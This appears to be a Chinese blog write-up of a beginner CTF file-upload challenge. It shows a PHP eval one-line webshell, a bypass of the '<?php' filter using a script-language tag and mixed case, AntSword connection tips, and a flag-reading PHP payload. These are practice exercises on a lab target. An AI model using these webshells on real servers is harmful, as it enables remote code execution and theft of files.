ichunqiu upload wp
网安菜鸡今天来划水了!
今天一直在肝网鼎的一道题,涉及的知识太多了,整不完了,只能随便水个题打开了【狗头】。CTF题目属于萌新入门级,写下WP仅供自己总结练习,大佬请自行绕路,另外如果有师傅愿意有每日轻松一笑环结,还望不吝赐教。【狗头】
打开题目,是一个上传文件的页面,提示:可以上传任意文件。
先找了一个JPG的图像,显示上传成功,然后又测试了TXT文本,也是上传成功,最后传了PHP文件,还是显示上传成功,所以证明前端对文件格式没有限制。
但是我们上传PHP一句话木马文件后,点击查看输出结果。
<?php @eval($_POST['abc']);?>
虽然上传成功,但是给我们返回了这么个东西
证明<?php被过滤掉了。
解决这个方法的思路是看看有没有办法绕过过滤,把PHP一句话木马传到后台。
于是找了个可以绕过的
<script language="pHp">@eval($_POST['abc'])</script>
点击之后发现是空页,代表我们上传成功!
接下来用蚁剑链接
这里需要注意URL地址路径一定是你传一句话木马的路径,不然无法连接成功。本题的路径就是显示上传成功,然后点击超链接查看上传的文件,此时URL已经跳转完成,即为上传文件的路径。
在html目录下即可找到flag.php。
还有一个办法是可以不用蚁剑或菜刀链接,直接用上传的php源代码把flag显示出来。
<?php
$fh=fopen('../flag.php','r');
echo fread($fh,filesize("../flag.php"));
fclose($fh);
?>
初始上传的文件是这样的,但是<? 和 php 被过滤了,用大小写(PHP,pHp)绕过php过滤,用<script language=“pHp”> 绕过<?过滤,最终上传的文件:
<script language="PHP">
$fh=fopen("../flag.".strtolower("PHP"),'r');
echo fread($fh,filesize("../flag.".strtolower("PHP")));
fclose($fh);
</script>
最后会在页面上显示出flag,但是这种方法有一个弊端,就是得事先知道flag文件的存储路径,这道题是在上一级目录下也就是html目录下存放,所以相对路径是…/flag.php ,两个点代表上级目录。如果没有经验的小白推荐还是上传一句话木马,在蚁剑里查看网站目录结构,再在其中寻找flag。
很久以前,就做过一道upload文件上传的题目,当时踩了很多坑,一个是前端过滤需要抓包改包,再一个是一句话木马,post要大写,还有一个就是蚁剑的URL一定是一句话的路径,希望大家和我以后做题多多注意。
纪念一下当时呆萌的自己【狗头】
ichunqiu upload wp相关推荐
- 网络攻防路-ichunqiu upload
i春秋上的一道题Upload 题目 题解: 发现被屏蔽了<? php 重新编辑,上传 发现页面一片空白,查看网页源代码,得到flag 后记: <!DOCTYPE html> < ...
- ichunqiu Web SQli wp
2020.1.10 菜鸡今天又来水题了. 其实这个题,不是很水[狗头]在i春秋平台上看到了一道名为SQli的web题,想到了自己玩过1%的那个靶场也叫sqli-libs,于是手贱的打开了.咋一看还蛮友 ...
- 面向萌新的红帽杯2018线上赛wp
网络安全攻防大赛第二届"红帽杯"网络安全攻防大赛(除了web3 guess id,不会做.没写.) misc2 Not Only Wireshark 下载流量包,wireshark ...
- MTCTF2022 WP
Web easypickle 源码 import base64 import pickle from flask import Flask, session import os import rand ...
- CTF Web题 部分WP
1.web2 听说聪明的人都能找到答案 http://123.206.87.240:8002/web2/ CTRL + u 查看源代码 2.计算器 http://123.206.87.240:8002 ...
- decode判断不为空拼接_空指针4月内部赛官方WP
本次内部赛含WEB跟RE题目各一道,其中RE题目7人解出,WEB题目1人解出,恭喜以上选手. 下面放上本次内部赛的WP. RE题目由于前几次的空指针题目太难了,所以这次出了一道较为简单的题(要不然每次 ...
- upload总结及一般处理思路步骤
Table of Contents upload的一般的检测手段及绕过方法总结: 一,前端的javascript检测: 一般的绕过方法: 1,禁用前端的javascript检测 2,直接F12,修改页 ...
- 中upload依赖包_upload-labs writeup
upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场.旨在帮助大家对上传漏洞有一个全面的了解.目前一共20关,每一关都包含着不同上传方式.github地 ...
- 史上最详细sql注入wp
文章目录 sql注入wp(史上最详细) 前言 什么是SQL注入? SQL注入的原理 常见的注入方式 常见绕过技巧 常见防控SQL注入的方法 手工查询语句 Basic Challenges Less-1 ...
最新文章
- redhat中使用securecrt 中文乱码解决办法
- nginx日志通过rsyslog传入到日志服务器指定目录
- JS函数重载解决方案
- 不写画面的网页程序设计,Web API、Web Service、WCF Service
- QT的QJSValue类的使用
- Mysqldump逻辑备份与恢复
- 基于密度的停留点识别方法
- OpenCV辅助对象(help objects)(2)_Range
- 500万相机芯片尺寸_MGS二代系列500万像素新品面世
- 【转】JAVA成长之路
- JavaScript中的数据结构及实战系列(1):队列
- 泛微OA如何重置管理员密码
- 看看“电子招投标平台”是如何识破“围标串标”的,看完少走弯路
- 应用文写作(超星尔雅)
- react异常 Each child in a list should have a unique “key” prop
- python列表元素提取_python提取list中的元素
- 什么是串口通信UART?
- 第一次养狗_如何度过艰难的第一个月
- appcan 文件下载到根目录(pdf)
- [数分笔记]关于有限覆盖定理